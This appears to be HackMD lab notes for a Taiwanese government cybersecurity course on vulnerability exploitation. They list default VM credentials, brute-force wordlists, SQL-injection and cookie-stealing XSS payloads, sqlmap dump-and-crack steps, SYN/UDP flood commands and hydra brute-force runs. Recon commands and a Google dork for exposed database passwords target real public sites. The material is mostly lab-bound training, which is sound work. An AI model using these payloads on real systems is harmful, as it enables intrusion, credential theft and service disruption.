# 公務人力發學院資安專業課程 - 系統與網路應用程式漏洞偵測及利用手法剖析 ## 【所需軟體及VM】 1. Virtualbox (6.1.4以上版本) 2. Oracle VM VirtualBox Extension Pack (6.1.4以上版本) 3. Kali Linux 2020.1 VM(本課程客製化版本) 4. OWASPBWA VM 5. Metasblpotable2 VM ## 【登入帳密】 ### Kali Linux user/user ### OWASPBWA root/owaspbwa ### metaspliotable2 msfadmin/msfadmin ### OpenVAS admin/admin ### Nessus user/user ## 【user.txt】 root guest klog msfadmin postgres sys service user 1337 pablo smithy admin administrator ## 【passlist.txt】 123456789 admin msfadmin batman starwar service user myadmin password passwd postgres guest letmein charley ## 【tcpdump】 ### *列出可以擷取的網卡 tcpdump -D ### *擷取與Host1主機相關的TCP封包 tcpdump -i eth0 'tcp and host Host1' ### *擷取與Host1主機相關的TCP封包,並存為Host1.pcap檔 tcpdump -i eth0 -w Host1.pcap 'tcp and host Host1' ### *讀取並顯示Host1.pcap檔的封包 tcpdump -r Host1.pcap ## 【TShark】 ### *列出可以擷取的網卡 tshark -D ### *擷取與Host1主機相關的TCP封包 tshark -i eth0 -f 'tcp and host Host1' ### *擷取與Host1主機相關的TCP封包,並存為Host1.pcap檔 tshark -i eth0 -w Host1.pcap -f 'tcp and host Host1' ### *讀取並顯示Host1.pcap檔的封包 tshark -r Host1.pcap ## 【Display Filter】 https://wiki.wireshark.org/DisplayFilters ## 【Capture Filter】 https://wiki.wireshark.org/CaptureFilters ## 【Wolframalpha】 http://www.wolframalpha.com/ ## 【archive.org】 https://archive.org/ ## 【DMitry】 dmitry -wisen -o hinet.txt www.hinet.net ## 【Google Hacking找MySQL帳密資訊】 intext:DB_PASSWORD || intext:”MysQL hostname” ext:txt ## 【nmap】 nmap -A 10.0.2.4 ## 【WhatWeb】 whatweb -v www.cht.com.tw ## 【wafw00f】 wafw00f www.hinet.net 也可用nmap script偵測WAF,如下: nmap -p 80,443 --script http-waf-detect www.hinet.net ## 【lbd】 lbd www.hinet.net lbd tw.yahoo.com ## 【sslscan】 sslscan 10.0.2.5 ## 【sslyze】 sslyze --regular 10.0.2.5 ## 【Nessus下載】 https://www.tenable.com/downloads/nessus ## 【Nessus Essentials Activation Code】 https://zh-tw.tenable.com/products/nessus/nessus-essentials ## 【lynis】 lynis update check lynis audit system ## 【SQL Injection免密碼登入網站】 http://10.0.2.5/multillidae/ username:admin password: ' or '1' = '1 ## 【ZAP網頁弱掃】 http://10.0.2.5/mutillidae ## 【OTG03-身份管理測試】 http://10.0.2.5/wordpress/wp-login.php ## 【OTG05-授權測試】 http://10.0.2.5/bWAPP/login.php 帳號:bee 密碼:bug ## 【OTG07-輸入驗證測試】 http://10.0.2.5/WebGoat 帳號:webgoat 密碼:webgoat ## 【關閉Firefox JavaScript filter 】 網址列: about:config 搜尋: browser.urlbar.filter.javascript 將其值變更為 false ## 【Damn Vulnerable Web Application】 http://10.0.2.5/dvwa/ 帳號:admin 密碼:admin ## 【XSS語法】 #<script>alert('xss')</script> #<script>alert(document.cookie)</script> ## 【繞過XSS防護】 #<sCripT>alert('xss')</Script> #<sc<script>ript>alert('xss')</script> #"><script>alert('xss')</script><a=" #"%3cscript%3ealert('xss')%3c/script%3e #<img src="#"onerror=alert('xss')> ## 【SQLMAP】 *列出Banner,並測試欄位是否有SQL Injection弱點 sqlmap -u "http://10.0.2.5/dvwa/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie="security=low;PHPSESSIONID=XXXXX;" --banner *列舉資料庫 sqlmap -u "http://10.0.2.5/dvwa/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie="security=low;PHPSESSIONID=XXXXX;" --dbs *列舉資料表 sqlmap -u "http://10.0.2.5/dvwa/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie="security=low;PHPSESSIONID=XXXXX;" -D dvwa --tables *列舉欄位(Columns) sqlmap -u "http://10.0.2.5/dvwa/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie="security=low;PHPSESSIONID=XXXXX;" -D dvwa -T users --columns *匯出資料 sqlmap -u "http://10.0.2.5/dvwa/vulnerabilities/sqli/?id=123&Submit=Submit" --cookie="security=low;PHPSESSIONID=XXXXX;" -D dvwa -T users -C user,password --dump *轉換users.csv格式 sed -i 's/,/:/g' /home/user/.sqlmap/output/10.0.2.5/dump/dvwa/users.csv *使用John the Ripper破密 sudo john --format=raw-MD5 /home/user/.sqlmap/output/10.0.2.5/dump/dvwa/users.csv ## 【UDP Flooding 】 hping3 -q -n -a 10.0.2.3 --udp -s 53 --keep -p 68 --flood 10.0.2.5 ## 【SYN Flooding Demo - 使用Metasploit Framework】 sudo msfconsole use auxiliary/dos/tcp/synflood show options set RHOST 10.0.2.5 run ## 【SYN Flooding Demo - 使用hping3】 hping3 -I eth0 -d 120 -S -w 64 -p 80 --flood 10.0.2.5 --rand-source ## 【telnet暴力破解】 hydra –L user.txt –P passlist.txt –t 2 telnet://10.0.2.4 ## 【SSH 暴力破解】 patator ssh_login host=10.0.2.4 user=FILE0 password=FILE1 0=user.txt 1=passlist.txt –x ignore:mesg=’Authentication failed.’ ## 【FTP暴力破解】 hydra –L user.txt –P passlist.txt –t 4 ftp://10.0.2.4 ## 【PostgreSQL暴力破解】 hydra –L user.txt –P passlist.txt –t 4 postgres://10.0.2.4 ## 【MySQL暴力破解】 hydra –L user.txt –P passlist.txt –t 1 -e nsr mysql://10.0.2.4 ## 【Web暴力破解】 http://10.0.2.5/wordpress/wp-login.php
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up